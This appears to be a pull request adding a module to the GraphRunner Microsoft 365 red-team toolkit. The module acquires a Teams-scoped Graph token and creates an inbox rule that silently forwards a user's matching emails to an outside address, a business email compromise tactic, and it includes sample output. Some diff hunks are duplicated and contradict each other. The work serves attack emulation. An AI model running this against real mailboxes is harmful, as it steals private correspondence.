### PR TITLE
[New Module] Invoke-CreateInboxForwardingRule

### DIFF
--- a/GraphRunner.ps1
+++ b/GraphRunner.ps1
@@ -1536,7 +1536,7 @@ Function Invoke-CreateInboxForwardingRule {
             if ($answer -eq "yes" -or $answer -eq "y") {
                 Write-Host -ForegroundColor yellow "[*] Running Get-GraphTokens now..."
                 # Using the Teams client ID to get a token scoped to MailboSettings.ReadWrite
-                $tokens = Get-GraphTokens -ExternalCall -Client "Custom" -ClientID "1fec8e78-bce4-4aaf-ab1b-5451cc387264" -Browser $Browser -Device $Device
+                $tokens = Get-GraphTokens -ExternalCall -Client "Custom" -ClientID "1fec8e78-bce4-4aaf-ab1b-5451cc387264"
                 $auth = "Yes"
             }
             elseif ($answer -eq "no" -or $answer -eq "n") {

--- a/GraphRunner.ps1
+++ b/GraphRunner.ps1
@@ -7497,7 +7497,7 @@ Invoke-SearchMailbox`t`t-`t Has the ability to do deep searches across a user’
 Invoke-SearchTeams`t`t-`t Can search all Teams messages in all channels that are readable by the current user.
 Invoke-SearchUserAttributes`t-`t Search for terms across all user attributes in a directory
 Get-Inbox`t`t`t-`t Gets inbox items
-Invoke-CreateInboxForwardingRule`t`t`t-`t Creates a 
+Invoke-CreateInboxForwardingRule -`t Creates an inbox forwarding rule that forwards all emails matching a specified term to an email address. 
 Get-TeamsChat`t`t`t-`t Downloads full Teams chat conversations
     "
     Write-Host -ForegroundColor green "-------------------- Teams Modules -------------------"

--- a/GraphRunner.ps1
+++ b/GraphRunner.ps1
@@ -1444,7 +1444,7 @@ Function Get-Inbox{
     }
 }
 
-Function Invoke-CreateInboxRule {
+Function Invoke-CreateInboxForwardingRule {
     <#
     .SYNOPSIS
 
@@ -1455,7 +1455,7 @@ Function Invoke-CreateInboxRule {
         Optional Dependencies: None
 
     .DESCRIPTION
-        
+         The `Invoke-CreateInboxForwardingRule` function creates an inbox rule that forwards emails matching a specified term to another email address. This is a documented tactic used during business email compromise (BEC) attacks. This function requires an access token with the MailboxSettings.ReadWrite scope, which is available in tokens that are requested with the Microsoft Teams client ID. Teams is in the Family of Client IDs (FOCI) so any M365 scoped refresh token may refresh into a Teams scoped access token. This function handles authentication using the Teams client ID.  
 
     .PARAMETER Tokens
 
@@ -1485,7 +1485,7 @@ Function Invoke-CreateInboxRule {
 
     .EXAMPLE
         
-        C:\PS> Invoke-CreateInboxRule -Tokens $tokens -EmailAddressName husky -RuleTerm salary -RuleName salary -EmailAddress "someevilemail@whatevs.com" -UserId "targetuser@targettenant.onmicrosoft.com"
+        C:\PS> Invoke-CreateInboxForwardingRule -Tokens $tokens -EmailAddressName husky -RuleTerm salary -RuleName salary -EmailAddress "someevilemail@whatevs.com" -UserId "targetuser@targettenant.onmicrosoft.com"
         -----------
         
     #>
@@ -1536,7 +1536,7 @@ Function Invoke-CreateInboxRule {
             if ($answer -eq "yes" -or $answer -eq "y") {
                 Write-Host -ForegroundColor yellow "[*] Running Get-GraphTokens now..."
                 # Using the Teams client ID to get a token scoped to MailboSettings.ReadWrite
-                $tokens = Get-GraphTokens -ExternalCall -Client "Custom" -ClientID "1fec8e78-bce4-4aaf-ab1b-5451cc387264"
+                $tokens = Get-GraphTokens -ExternalCall -Client "Custom" -ClientID "1fec8e78-bce4-4aaf-ab1b-5451cc387264" -Browser $Browser -Device $Device
                 $auth = "Yes"
             }
             elseif ($answer -eq "no" -or $answer -eq "n") {
@@ -1588,6 +1588,7 @@ Function Invoke-CreateInboxRule {
 
     try {
         $response = Invoke-RestMethod -Uri $graphApiUrl -Headers $headers -Method Post -Body $jsonData
+        Write-Host -ForegroundColor Green "[*] Forwarding rule created successfully."
         Write-Output $response
     }
     catch {
@@ -7496,6 +7497,7 @@ Invoke-SearchMailbox`t`t-`t Has the ability to do deep searches across a user’
 Invoke-SearchTeams`t`t-`t Can search all Teams messages in all channels that are readable by the current user.
 Invoke-SearchUserAttributes`t-`t Search for terms across all user attributes in a directory
 Get-Inbox`t`t`t-`t Gets inbox items
+Invoke-CreateInboxForwardingRule`t`t`t-`t Creates a 
 Get-TeamsChat`t`t`t-`t Downloads full Teams chat conversations
     "
     Write-Host -ForegroundColor green "-------------------- Teams Modules -------------------"


### PR DESCRIPTION
This adds a simple email inbox forwarding rule module to aid in the emulation of Business Email Compromise scenarios. This module authenticates with the Microsoft Teams client to retrieve a correctly scoped token, then calls the Graph API to create an email inbox forwarding rule. You can specify the rule term and the forwarding address. I built the module to mirror the other module's authentication flows and conventions so it should look pretty familiar.

```
PS> Invoke-CreateInboxForwardingRule -Tokens $tokens -EmailAddressName husky -RuleTerm salary -RuleName salary -EmailAddress someemail@whatevs.com -UserId "target@targettenant.onmicrosoft.com"

[*] First, you need to login.
[*] If you already have tokens you can use the -Tokens parameter to pass them to this function.
[*] Do you want to authenticate now (yes/no)?
yes
[*] Running Get-GraphTokens now...
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code [CODE] to authenticate.
[*] Successful authentication. Access and refresh tokens have been written to the global $tokens variable. To use them with other GraphRunner modules use the Tokens flag (Example. Invoke-DumpApps -Tokens $tokens)
[!] Your access token is set to expire on: 07/09/2024 13:58:54
[*] Creating forwarding rule...
[*] Forwarding rule created successfully.


@odata.context : https://graph.microsoft.com/v1.0/$metadata#users('[USER ID])/mailFolders('inbox')/messageRules/$entity
id             : AQAAAIezxiY=
displayName    : salary
sequence       : 2
isEnabled      : True
hasError       : False
isReadOnly     : False
conditions     : @{subjectContains=System.Object[]}
actions        : @{stopProcessingRules=True; forwardTo=System.Object[]}
```

My plan is to expand this into more modules and also make the parameters more flexible so we can emulate more types of BEC inbox rule shenanigans, but I wanted to get this into the repo as an MVP.

See: #12 